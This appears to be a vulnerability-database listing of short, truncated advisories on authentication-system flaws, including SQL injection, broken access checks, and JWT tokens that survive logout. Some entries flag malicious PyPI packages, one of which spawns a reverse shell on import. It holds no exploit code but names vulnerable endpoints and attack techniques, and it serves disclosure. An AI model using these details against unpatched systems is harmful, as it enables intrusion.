EUVD-2023-53984

Malicious code in bioql PyPI...

EUVD-2025-21385

Malicious code in bioql PyPI...

PT-2025-37074

Name of the Vulnerable Software and Affected Versions: Indico versions prior to 3.3.8 Description: Indico is an event management system that utilizes Flask-Multipass, a multi-backend authentication system for Flask. A broken access check in a legacy API used to retrieve user details allowed...

uverif 安全漏洞

uverif is a free and open source web authentication management system from uverif. A security vulnerability exists in uverif 3.2 and earlier versions, which stems from SQL injection due to incorrect manipulation of the parameter note of the function addbatch in the file /admin/kamilist...

Moderate: Red Hat Security Advisory: Red Hat build of Keycloak 26.2.6 Security Update

New Red Hat build of Keycloak 26.2.6 packages are available from the Customer Portal Red Hat build of Keycloak 26.2.6 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications. Security fixes...

CVE-2025-53640

Indico is an event management system that uses Flask-Multipass, a multi-backend authentication system for Flask. Starting in version 2.2 and prior to version 3.3.7, an endpoint used to display details of users listed in certain fields such as ACLs could be misused to dump basic user details such ...

File Browser’s insecure JWT handling can lead to session replay attacks after logout

Summary File Browser’s authentication system issues long-lived JWT tokens that remain valid even after the user logs out. Please refer to the CWE's listed in this report for further reference and system standards. In summary, the main issue is: - Tokens remain valid after logout session replay...

GHSA-7XWP-2CPP-P8R7 File Browser’s insecure JWT handling can lead to session replay attacks after logout

Summary File Browser’s authentication system issues long-lived JWT tokens that remain valid even after the user logs out. Please refer to the CWE's listed in this report for further reference and system standards. In summary, the main issue is: - Tokens remain valid after logout session replay...

CVE-2025-53826 FileBrowser Has Insecure JWT Handling Which Allows Session Replay Attacks after Logout

File Browser provides a file managing interface within a specified directory and it can be used to upload, delete, preview, rename, and edit files. In version 2.39.0, File Browser’s authentication system issues long-lived JWT tokens that remain valid even after the user logs out. As of time of...

PT-2025-29588

Name of the Vulnerable Software and Affected Versions File Browser version 2.39.0 Description File Browser provides a file managing interface within a specified directory, allowing users to upload, delete, preview, rename, and edit files. The authentication system in version 2.39.0 issues...

Moderate: krb5 security update

Kerberos is a network authentication system, which can improve the security of your network by eliminating the insecure practice of sending passwords over the network in unencrypted form. It allows clients and servers to authenticate to each other with the help of a trusted third party, the...

CVE-2024-45042

Ory Kratos is an identity, user management and authentication system for cloud services. Prior to version 1.3.0, given a number of preconditions, the highestavailable setting will incorrectly assume that the identity’s highest available AAL is aal1 even though it really is aal2. This means that t...

CVE-2024-55008

JATOS 3.9.4 contains a denial-of-service DoS vulnerability in the authentication system, where an attacker can prevent legitimate users from accessing their accounts by repeatedly sending multiple failed login attempts. Specifically, by submitting 3 incorrect login attempts every minute, the...

CVE-2023-34240

Cloudexplorer-lite is an open source cloud software stack. Weak passwords can be easily guessed and are an easy target for brute force attacks. This can lead to an authentication system failure and compromise system security. Versions of cloudexplorer-lite prior to 1.2.0 did not enforce strong...

CVE-2022-33178

A vulnerability in the radius authentication system of Brocade Fabric OS before Brocade Fabric OS 9.0 could allow a remote attacker to execute arbitrary code on the Brocade switch...

CVE-2021-29452

a12n-server is an npm package which aims to provide a simple authentication system. A new HAL-Form was added to allow editing users in version 0.18.0. This feature should only have been accessible to admins. Unfortunately, privileges were incorrectly checked allowing any logged in user to make th...

CVE-2020-8826

As of v1.5.0, the Argo web interface authentication system issued immutable tokens. Authentication tokens, once issued, were usable forever without expiration—there was no refresh or forced re-authentication...

CVE-2011-4801

SQL injection vulnerability in akeyActivationLogin.do in Authenex Web Management Control in Authenex Strong Authentication System ASAS Server 3.1.0.2 and 3.1.0.3 allows remote attackers to execute arbitrary SQL commands via the username parameter...

RLSA-2024:5312 Moderate: krb5 security update

Kerberos is a network authentication system, which can improve the security of your network by eliminating the insecure practice of sending passwords over the network in unencrypted form. It allows clients and servers to authenticate to each other with the help of a trusted third party, the...

Malicious code in flask-auth-sys (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 a241889bfae20aee5395660063d13f337aa9733c14b02bf2edb004d6d36e1d41 On importing the module, the code attempts to span a reverse shell. In the current version, the remote domain does not exist --- Category: MALICIOUS - The...